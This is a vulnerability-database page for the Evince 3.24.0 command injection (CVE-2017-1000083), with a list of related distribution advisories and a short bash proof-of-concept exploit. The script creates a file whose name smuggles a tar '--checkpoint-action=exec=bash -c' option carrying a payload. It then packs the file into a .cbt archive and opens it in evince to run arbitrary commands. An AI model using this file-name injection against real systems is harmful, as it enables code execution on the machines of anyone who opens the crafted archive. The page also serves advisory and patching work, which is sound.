Evince 3.24.0 Command Injection

🗓️ 13 Nov 2018 00:00:00Reported by MatlinkType

packetstorm🔗 packetstormsecurity.com👁 167 Views

Evince 3.24.0 Command Injection CVE-2017-100008

Reporter	Title	Published	Views	Family All 94
FreeBSD	evince and atril -- command injection vulnerability in CBT handler	6 Jul 201700:00	–	freebsd
0day.today	Evince 3.24.0 - Command Injection Exploit	13 Nov 201800:00	–	zdt
0day.today	Evince CBT File Command Injection Exploit	7 Feb 201900:00	–	zdt
ATTACKERKB	CVE-2017-1000083	5 Sep 201700:00	–	attackerkb
AlpineLinux	CVE-2017-1000083	5 Sep 201706:00	–	alpinelinux
ArchLinux	[ASA-201707-14] evince: arbitrary command execution	14 Jul 201700:00	–	archlinux
Tenable Nessus	CentOS 7 : evince (CESA-2017:2388)	25 Aug 201700:00	–	nessus
Tenable Nessus	Debian DLA-1031-1 : evince security update	19 Jul 201700:00	–	nessus
Tenable Nessus	Debian DSA-3911-1 : evince - security update	17 Jul 201700:00	–	nessus
Tenable Nessus	Debian DSA-3916-1 : atril - security update	24 Jul 201700:00	–	nessus

`# Exploit Title: evince command line injection  
# Date: 2017-09-05  
# Exploit Author: Matlink  
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince  
# Software Link: https://wiki.gnome.org/Apps/Evince  
# Version: 3.24.0  
# Tested on: Debian sid  
# CVE : CVE-2017-1000083  
  
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083  
  
#! /bin/bash  
  
# define the payload  
export PAYLOAD="firefox google.com"  
  
# Create the malicious .cbt file  
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000  
tar cvf poc.cbt *.jpg  
  
# Run the malicious file  
evince poc.cbt  
  
  
`

13 Nov 2018 00:00Current

0.1Low risk

Vulners AI Score0.1

EPSS0.76136